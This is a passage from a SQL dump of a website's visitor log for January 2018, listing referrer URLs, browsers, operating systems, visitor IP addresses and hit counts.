YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTHZNbWlqZVh0akFPOUEyOWFkNEhFR0UtX294YWRjcTAwdzdDRUFYX1FXUjgybjNfSG00WEtOem04NXhVV0VUX0Y4OVNnNXF6dXBjUThlRm40a3JJVVY&b64e=2&sign=7c04c6b08689af9f418d107104e1c2d3&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfQ4v1sDZPwJskUQ7lNg4BuOKDmHmjEuNKk8LRmWUWEJPGhclonyt1vAeEvgtPAtyznxXAhbuYG9I13gN1ld3WozlQa7QcnEBNtXBWH4K96xQpoMP59f8mAOMkNlY6-8Ax&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocP0EFaUr7wJJXNOnUfvJEqKk5w_6DG7NHm_Euu1t-4YSxOZI697r0lrXWdxnF2S4zug&l10n=ru&cts=1516508530716&mc=1.98533974576','Opera Next','Windows','49.0.2725.47','','95.220.212.236','000',2,0),(17300,'2018-01-21','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.4','000',1,0),(17301,'2018-01-21','https://zphiblgz.org','Chrome','iPhone','63.0.3239.73','','71.114.37.67','000',2,0),(17302,'2018-01-21','https://zphiblgz.org','Chrome','Windows','45.0.2454.85','','66.129.102.52','000',2,0),(17303,'2018-01-21','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.67.32.133','000',13,0),(17304,'2018-01-21','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(17305,'2018-01-21','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','40.77.63.70','000',1,0),(17306,'2018-01-21','https://zphiblgz.org','Firefox','Windows','40.1','','78.92.202.164','000',2,0),(17307,'2018-01-21','https://zphiblgz.org','Firefox','Macintosh','53.0','','192.198.80.227','000',2,0),(17308,'2018-01-21','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.91','000',10,0),(17309,'2018-01-21','https://zphiblgz.org','Safari','iPhone','11.0','','108.18.105.152','000',1,0),(17310,'2018-01-21','android-app://com.google.android.googlequicksearchbox','Chrome','Android','63.0.3239.111','','68.82.250.96','000',2,0),(17311,'2018-01-21','https://zphiblgz.org','Firefox','Windows','40.1','','14.176.176.61','000',2,0),(17312,'2018-01-21','https://zphiblgz.org','Safari','iPhone','9.0','','221.11.231.248','000',1,0),(17313,'2018-01-21','https://zphiblgz.org','Safari','iPhone','9.0','','1.202.79.165','000',1,0),(17314,'2018-01-21','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','68.230.204.73','000',3,0),(17315,'2018-01-21','https://zphiblgz.org','MSIE','Windows','7.0','','178.154.148.116','000',2,0),(17316,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','97.74.24.101','000',1,0),(17317,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.103.173.100','000',1,0),(17318,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','97.79.236.99','000',1,0),(17319,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','188.93.144.176','000',1,0),(17320,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.210.23.174','000',1,0),(17321,'2018-01-21','https://zphiblgz.org','Firefox','Windows','40.1','','78.191.34.111','000',2,0),(17322,'2018-01-21','https://zphiblgz.org','Firefox','Windows','40.1','','182.68.140.254','000',2,0),(17323,'2018-01-21','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','173.69.176.199','000',6,0),(17324,'2018-01-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',6,0),(17325,'2018-01-21','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.146','000',1,0),(17326,'2018-01-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.157','000',1,0),(17327,'2018-01-21','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.156','000',1,0),(17328,'2018-01-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.137','000',1,0),(17329,'2018-01-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17330,'2018-01-21','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(17331,'2018-01-21','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',10,0),(17332,'2018-01-21','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.18','000',1,0),(17333,'2018-01-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.21','000',1,0),(17334,'2018-01-21','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(17335,'2018-01-21','https://www.google.com/','Safari','iPhone','10.0','','23.31.207.225','000',2,0),(17336,'2018-01-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(17337,'2018-01-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(17338,'2018-01-21','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.146','000',1,0),(17339,'2018-01-21','https://www.google.com/','Chrome','Chrome OS','63.0.3239.140','','108.220.161.86','000',2,0),(17340,'2018-01-21','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.10.105','000',1,0),(17341,'2018-01-21','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.10.108','000',1,0),(17342,'2018-01-21','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.55.41','000',1,0),(17343,'2018-01-21','http://rangjued.com/','Opera','Windows','9.00','','178.137.55.200','000',3,0),(17344,'2018-01-21','https://www.google.com/','SamsungBrowser','Android','6.2','','173.67.10.163','000',12,0),(17345,'2018-01-21','https://zphiblgz.org','SamsungBrowser','Android','6.2','','100.16.226.186','000',3,0),(17346,'2018-01-21','https://zphiblgz.org','Firefox','Windows','40.1','','5.121.73.240','000',2,0),(17347,'2018-01-21','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(17348,'2018-01-21','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(17349,'2018-01-22','https://zphiblgz.org','MSIE','Windows','6.0','','146.185.223.202','000',1,0),(17350,'2018-01-22','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(17351,'2018-01-22','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(17352,'2018-01-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(17353,'2018-01-22','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(17354,'2018-01-22','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','71.166.43.211','000',2,0),(17355,'2018-01-22','https://zphiblgz.org','Firefox','Windows','40.1','','92.185.157.181','000',2,0),(17356,'2018-01-22','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(17357,'2018-01-22','https://zphiblgz.org','Firefox','Windows','40.1','','1.1.210.37','000',2,0),(17358,'2018-01-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','40.86.101.33','000',1,0),(17359,'2018-01-22','https://www.google.com/','Chrome','Android','63.0.3239.111','','174.205.6.216','000',2,0),(17360,'2018-01-22','https://lm.facebook.com/','Chrome','Android','63.0.3239.111','','174.205.12.134','000',8,0),(17361,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.62','000',2,0),(17362,'2018-01-22','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','65.55.213.30','000',1,0),(17363,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.70','000',2,0),(17364,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.69','000',2,0),(17365,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.195','000',2,0),(17366,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.184','000',2,0),(17367,'2018-01-22','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.226','000',1,0),(17368,'2018-01-22','https://zphiblgz.org','Firefox','Windows','40.1','','81.214.143.159','000',2,0),(17369,'2018-01-22','https://zphiblgz.org','Firefox','Windows','40.1','','77.54.137.212','000',2,0),(17370,'2018-01-22','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(17371,'2018-01-22','https://zphiblgz.org/','MSIE','Windows','11.0','','180.211.120.61','000',1,0),(17372,'2018-01-22','https://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',1,0),(17373,'2018-01-22','https://zphiblgz.org','Chrome','Linux','56.0.2924.87','','192.198.80.227','000',2,0),(17374,'2018-01-22','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',2,0),(17375,'2018-01-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(17376,'2018-01-22','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.177.175','000',1,0),(17377,'2018-01-22','https://www.google.com/','Safari','Macintosh','11.0.2','','129.2.181.105','000',2,0),(17378,'2018-01-22','https://zphiblgz.org','MSIE','Macintosh','10.0','','162.222.148.183','000',1,0),(17379,'2018-01-22','https://zphiblgz.org','Android Browser','Android','4.0','','104.222.45.136','000',1,0),(17380,'2018-01-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(17381,'2018-01-22','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(17382,'2018-01-22','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(17383,'2018-01-22','https://www.google.com/','Chrome','Windows','63.0.3239.132','','107.181.102.2','000',10,0),(17384,'2018-01-22','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.86.110.159','000',5,0),(17385,'2018-01-22','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',4,0),(17386,'2018-01-22','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','178.255.86.1','000',3,0),(17387,'2018-01-22','https://zphiblgz.org','Safari','iPhone','8.0','','123.125.67.207','000',1,0),(17388,'2018-01-22','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.51.81','000',1,0),(17389,'2018-01-22','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.99','000',1,0),(17390,'2018-01-22','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','131.171.200.183','000',8,0),(17391,'2018-01-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(17392,'2018-01-22','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.35','000',1,0),(17393,'2018-01-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17394,'2018-01-22','74.220.219.51','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(17395,'2018-01-22','https://zphiblgz.org','Firefox','Windows','37.0','','138.185.154.94','000',1,0),(17396,'2018-01-22','https://zphiblgz.org','MSIE','Windows','5.0','','178.165.27.252','000',1,0),(17397,'2018-01-22','https://zphiblgz.org','Opera','Linux','12.00','','182.253.139.36','000',1,0),(17398,'2018-01-22','https://zphiblgz.org','MSIE','Windows','11.0','','27.193.4.54','000',1,0),(17399,'2018-01-22','https://zphiblgz.org','Chrome','Linux','40.0.895.0','','176.126.252.12','000',1,0),(17400,'2018-01-22','https://zphiblgz.org','Safari','Windows','5.0.3','','169.239.126.150','000',1,0),(17401,'2018-01-22','https://zphiblgz.org','Chrome','Macintosh','36.0.883.0','','60.173.58.216','000',1,0),(17402,'2018-01-22','https://zphiblgz.org','Chrome','Macintosh','36.0.883.0','','186.89.108.159','000',1,0),(17403,'2018-01-22','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(17404,'2018-01-22','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.146','000',1,0),(17405,'2018-01-22','https://zphiblgz.org/','Chrome','Linux','41.0.2272.118','','66.102.7.148','000',1,0),(17406,'2018-01-22','https://www.bing.com/','MSIE','Windows','11.0','','209.123.40.1','000',3,0),(17407,'2018-01-22','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(17408,'2018-01-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(17409,'2018-01-22','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','223.29.42.208','000',3,0),(17410,'2018-01-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.209.38','000',8,0),(17411,'2018-01-22','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.209.38','000',1,0),(17412,'2018-01-22','https://zphiblgz.org','Chrome','Linux','51.0.2704.103','','38.130.168.126','000',1,0),(17413,'2018-01-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',1,0),(17414,'2018-01-22','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','213.136.85.29','000',2,0),(17415,'2018-01-22','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.28','000',1,0),(17416,'2018-01-23','https://zphiblgz.org','MSIE','Windows','11.0','','222.184.184.230','000',2,0),(17417,'2018-01-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.142','000',1,0),(17418,'2018-01-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.146','000',1,0),(17419,'2018-01-23','https://zphiblgz.org','Firefox','Windows','40.1','','103.9.185.130','000',2,0),(17420,'2018-01-23','zphiblgz.org','Chrome','Windows','58.0.1145.75','','128.199.194.131','000',2,0),(17421,'2018-01-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(17422,'2018-01-23','http://rangjued.com/','Opera','Windows','9.0','','178.137.55.200','000',3,0),(17423,'2018-01-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',2,0),(17424,'2018-01-23','http://zphiblgz.org/','MSIE','Windows','6.0','','208.80.149.238','000',2,0),(17425,'2018-01-23','https://zphiblgz.org','Firefox','Macintosh','57.0','','50.225.39.81','000',5,0),(17426,'2018-01-23','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.24','000',2,0),(17427,'2018-01-23','https://zphiblgz.org','Firefox','Windows','40.1','','31.223.133.116','000',2,0),(17428,'2018-01-23','https://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',2,0),(17429,'2018-01-23','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.23','000',2,0),(17430,'2018-01-23','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.16','000',1,0),(17431,'2018-01-23','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(17432,'2018-01-23','https://zphiblgz.org','Chrome','Android','34.0.1847.118','','107.77.203.57','000',2,0),(17433,'2018-01-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',2,0),(17434,'2018-01-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.204','000',1,0),(17435,'2018-01-23','https://zphiblgz.org','SamsungBrowser','Android','6.2','','173.67.10.163','000',4,0),(17436,'2018-01-23','https://zphiblgz.org','MSIE','Windows','6.0','','218.66.74.201','000',1,0),(17437,'2018-01-23','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.81','000',8,0),(17438,'2018-01-23','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',2,0),(17439,'2018-01-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(17440,'2018-01-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(17441,'2018-01-23','https://www.google.com/','Chrome','Windows','63.0.3239.132','','156.40.216.1','000',6,0),(17442,'2018-01-23','http://zphiblgz.org/','Opera Next','Windows','19.0.1326.59','','195.22.125.122','000',3,0),(17443,'2018-01-23','https://zphiblgz.org','Chrome','Android','34.0.1847.118','','107.77.202.36','000',2,0),(17444,'2018-01-23','https://www.google.com/','Chrome','Windows','63.0.3239.132','','139.67.18.39','000',2,0),(17445,'2018-01-23','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(17446,'2018-01-23','https://www.google.com/','Chrome','Windows','63.0.3239.132','','205.222.248.19','000',3,0),(17447,'2018-01-23','https://www.google.com/','Safari','Macintosh','11.0.2','','66.250.190.33','000',2,0),(17448,'2018-01-23','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwiprImA6u7YAhVBXqwKHRapA1QQjRwIBw&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw2I202BCsvGNQv9PrRrLARw&ust=1516822422909254','MSIE','Windows','11.0','','69.24.145.22','000',1,0),(17449,'2018-01-23','https://www.google.com/','Chrome','Windows','63.0.3239.132','','167.102.191.10','000',3,0),(17450,'2018-01-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(17451,'2018-01-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(17452,'2018-01-23','https://zphiblgz.org','Firefox','Windows','40.1','','49.207.189.62','000',2,0),(17453,'2018-01-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.128.239.206','000',14,0),(17454,'2018-01-23','http://zphiblgz.org/ts_teams/dawn-j-kemp/','Chrome','Windows','56.0.2924.87','','89.28.24.190','000',1,0),(17455,'2018-01-23','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(17456,'2018-01-23','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','174.232.138.119','000',2,0),(17457,'2018-01-23','https://www.google.com/','Chrome','Windows','63.0.3239.132','','130.18.32.113','000',2,0),(17458,'2018-01-23','http://zphiblgz.org','Firefox','Linux','52.0','','185.13.156.236','000',2,0),(17459,'2018-01-23','http://zphiblgz.org','Opera','Windows','12.17','','185.13.156.236','000',3,0),(17460,'2018-01-23','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','64.124.135.22','000',4,0),(17461,'2018-01-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17462,'2018-01-23','https://zphiblgz.org','Firefox','Linux','40.0','','23.94.2.235','000',2,0),(17463,'2018-01-23','https://www.google.com/blank.html','MSIE','Windows','11.0','','104.129.88.191','000',1,0),(17464,'2018-01-23','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(17465,'2018-01-23','http://uptime-eu.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.130','000',1,0),(17466,'2018-01-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.154','000',1,0),(17467,'2018-01-23','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(17468,'2018-01-23','http://www.baidu.com/s?wd=MAA','Firefox','Windows','43.0','','14.215.176.10','000',1,0),(17469,'2018-01-23','http://zphiblgz.org/&wd=test','Firefox','Windows','43.0','','14.215.176.4','000',3,0),(17470,'2018-01-23','https://zphiblgz.org','MSIE','Windows','7.0','','69.28.88.139','000',1,0),(17471,'2018-01-23','https://zphiblgz.org/cache/v12/get_started','MSIE','Windows','7.0','','69.87.219.27','000',1,0),(17472,'2018-01-23','https://www.google.com/','Chrome','Macintosh','61.0.3163.100','','100.15.160.57','000',10,0),(17473,'2018-01-23','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.215','000',1,0),(17474,'2018-01-23','https://zphiblgz.org','MSIE','Windows','8.0','','178.154.148.116','000',1,0),(17475,'2018-01-23','https://zphiblgz.org','Safari','iPhone','9.0','','114.221.124.39','000',1,0),(17476,'2018-01-23','https://zphiblgz.org','Safari','iPhone','9.0','','113.58.228.197','000',1,0),(17477,'2018-01-24','https://zphiblgz.org','Firefox','Windows','40.1','','189.163.125.241','000',2,0),(17478,'2018-01-24','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.19','000',1,0),(17479,'2018-01-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.24','000',1,0),(17480,'2018-01-24','https://www.google.com/','Chrome','Windows','63.0.3239.132','','66.194.132.74','000',1,0),(17481,'2018-01-24','http://zphiblgz.org/','Firefox','Windows','30.0','','146.185.223.25','000',2,0),(17482,'2018-01-24','http://uptime-us.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.154','000',1,0),(17483,'2018-01-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.158','000',1,0),(17484,'2018-01-24','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(17485,'2018-01-24','https://zphiblgz.org','Firefox','Windows','40.1','','106.160.126.208','000',2,0),(17486,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','178.154.148.84','000',1,0),(17487,'2018-01-24','https://zphiblgz.org','Firefox','Windows','40.1','','80.12.80.200','000',2,0),(17488,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.141','000',2,0),(17489,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.8','000',4,0),(17490,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.11','000',10,0),(17491,'2018-01-24','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.117','000',1,0),(17492,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','209.222.83.71','000',7,0),(17493,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.104','000',4,0),(17494,'2018-01-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(17495,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.7','000',8,0),(17496,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.106','000',6,0),(17497,'2018-01-24','http://site.ru','Chrome','Windows','5.0.375.99','','91.240.87.143','000',2,0),(17498,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(17499,'2018-01-24','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(17500,'2018-01-24','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.90','000',1,0),(17501,'2018-01-24','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.17','000',1,0),(17502,'2018-01-24','https://zphiblgz.org','Firefox','Windows','40.1','','151.21.216.53','000',2,0),(17503,'2018-01-24','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(17504,'2018-01-24','http://site.ru','Chrome','Windows','5.0.375.99','','185.43.220.9','000',1,0),(17505,'2018-01-24','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.69.131','000',1,0),(17506,'2018-01-24','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(17507,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(17508,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','52.200.221.20','000',1,0),(17509,'2018-01-24','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.164','000',3,0),(17510,'2018-01-24','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',3,0),(17511,'2018-01-24','https://zphiblgz.org','Chrome','Android','34.0.1847.118','','107.77.202.36','000',1,0),(17512,'2018-01-24','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',2,0),(17513,'2018-01-24','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.170','000',3,0),(17514,'2018-01-24','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(17515,'2018-01-24','https://www.google.com.ph/','Chrome','Windows','63.0.3239.132','','122.52.251.226','000',3,0),(17516,'2018-01-24','https://zphiblgz.org','Firefox','Linux','3.0.13','','88.99.197.98','000',1,0),(17517,'2018-01-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',2,0),(17518,'2018-01-24','https://zphiblgz.org/','Safari','Macintosh','9.1.2','','179.218.97.20','000',2,0),(17519,'2018-01-24','https://www.google.com/','Chrome','Windows','63.0.3239.132','','69.25.204.117','000',1,0),(17520,'2018-01-24','https://zphiblgz.org','Safari','iPhone','10.0','','207.182.86.214','000',2,0),(17521,'2018-01-24','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(17522,'2018-01-24','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.146.203.82','000',2,0),(17523,'2018-01-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(17524,'2018-01-24','zphiblgz.org','Chrome','Windows','58.0.1145.75','','128.199.194.131','000',2,0),(17525,'2018-01-24','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.190','000',1,0),(17526,'2018-01-24','http://zphiblgz.org/','MSIE','Windows','6.0','','121.52.155.154','000',1,0),(17527,'2018-01-24','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(17528,'2018-01-24','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(17529,'2018-01-24','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(17530,'2018-01-24','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(17531,'2018-01-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.119','000',2,0),(17532,'2018-01-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1676.WX5hzQuUEWEHLFexT02tdr3JMABMlXIQSoeTtZDf7whlOrpktIxZDbWgk3PQKOhv.95abd450973710cfadcd082a30ab23edf5c543ab&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVU5ESlAyZm10dGt5WnB2OUh2T0lFNjY5VXBVWkt6S2tYZ1haZnExMk9BalVobU91WnhzNUNyNnl3b3c5MEpuTl9ubnJsYzdiZlpINXRFZlNfN2JVWWc&b64e=2&sign=1e958dc75fc92441515a36526b59e7c7&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTPv7-jVtnIwuzV8jadb-9fMH1XH0KrAeVILgSehZN3-1s9lYntRtL8svgnkmdA-GQnZZroelXgD8Gf3e-t4rC2ULtfKLZMH7A3PvEsOOba47z2Enqwsp67a6WbWJdgt5h&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX5No9jVno6g73Wo1dkMec5vVLdMnAfpZ80bGiw5DA7F0abmR1kuMSXXChowdm3LkGUQ9H94ZLP8g&l10n=ru&cts=1516830768394&mc=4.02240375973','Firefox','Windows','57.0','','5.228.16.95','000',2,0),(17533,'2018-01-24','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.150.212','000',3,0),(17534,'2018-01-24','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(17535,'2018-01-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(17536,'2018-01-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17537,'2018-01-24','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(17538,'2018-01-24','https://t.co/dozk3WHLgh?amp=1','Chrome','Android','63.0.3239.111','','76.106.101.221','000',3,0),(17539,'2018-01-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1676.7gDBak29HiDNKGC5SG5lIa1o8531Nsc5U9277MdI-bufzKXTBAEaKyvRA2OhPb9O.300ed1fe3269a758f688ee3e835a6da0832132cd&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIWGxaSjBGem9nQ3l0cU9xeGJPNVpTUHJOQUF6Z3MwQkZzM0hIbVMyN2hVTVNyVGk2cE9vMWVTSE53cnhLZ3NmRzJOUlBKZlI2ekFuOEhQMGlKbXJmcm81WUoxdUFCZFNqSDBqVGNyM1FnYWhjODRrXzdkR01uUg&b64e=2&sign=a01fadabc0c9551c311a8d6b6e08d4dd&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrFlFxvmGolsicgTee003JzzqGoJKpoPF6fc7_W7kJt0WQ65tLZ5A0Y_x2m51zCrUhowoqxGxs7M6R2UgesNX2aB_40A588SuPLHsR0VXiIwb6iJ_BlkVIJW2Z3zgZxBzs&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCURGPWsXpFn9pUtkmLTlIqUSxFKGzY2